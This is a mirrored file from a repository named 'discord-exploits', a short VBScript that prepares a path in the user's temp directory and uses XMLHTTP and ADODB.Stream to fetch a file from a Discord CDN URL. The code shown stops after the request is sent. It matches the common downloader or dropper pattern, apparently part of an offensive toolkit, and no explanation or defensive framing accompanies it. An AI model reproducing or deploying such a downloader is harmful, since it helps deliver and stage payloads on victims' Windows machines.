mirror of
https://github.com/Schmenn/discord-exploits.git
synced 2024-12-22 21:25:35 +00:00
a77abe5c32
a giant slice of bytes is never pretty
11 lines
359 B
Plaintext
11 lines
359 B
Plaintext
Set objShell = CreateObject("WScript.Shell")
|
|
Set objEnv = objShell.Environment("User")
|
|
|
|
strDirectory = objShell.ExpandEnvironmentStrings("%temp%")
|
|
|
|
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
|
|
dim bStrm: Set bStrm = createobject("Adodb.Stream")
|
|
xHttp.Open "GET", "https://cdn.discordapp.com/emojis/681577625394872370.png?v=1", False
|
|
xHttp.Send
|
|
|